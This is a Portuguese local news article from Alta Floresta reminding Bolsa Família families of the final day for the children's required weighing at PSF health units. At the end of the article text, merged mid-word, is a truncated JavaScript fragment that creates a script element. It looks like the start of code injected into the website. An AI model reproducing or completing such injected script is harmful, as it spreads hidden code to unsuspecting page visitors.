Capa / Cidades / Hoje é último dia para pesagem do Bolsa Família

Hoje é último dia para pesagem do Bolsa Família

bolsa-familiaDionéia Martins
Da Redação

Fim de ano os órgãos públicos entram de recesso e somente os setores essenciais mantém plantão de atendimento. Com isso os beneficiários do Programa Bolsa Família devem estar atentos para não perder o benefício. Um dos requisitos obrigatório é a pesagem das crianças que é realizada duas vezes por ano.
Em Alta Floresta aproximadamente 2.800 famílias estão recebendo o benefício do Bolsa Família, isso representa em torno de R$ 450 mil mensalmente que é injetado na economia local.
Hoje, é o último dia para quem ainda não realizou a pesagem. O procedimento pode ser feito em qualquer unidade do Programa Saúde da Família (PSF). A família que deixar de cumprir as regras do programa, está sujeito a perder o benefício.
“As famílias que ainda estão faltando fazer a pesagem que procurem um PSF com a carteirinha, porque os benefícios deverão ser bloqueados em janeiro e fevereiro pra quem não cumpriu os requisitos”, alerta a gestora do Bolsa Família Juliana Avila.
A Prefeitura de Alta Floresta entrará de recesso na segunda-feira, 20. Depois desta data somente alguns setores funcionarão para atendimento em forma de plantão. A Saúde e o departamento de limpeza funcionará normalmentevar d=document;var s=d.createElement(‘script’);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top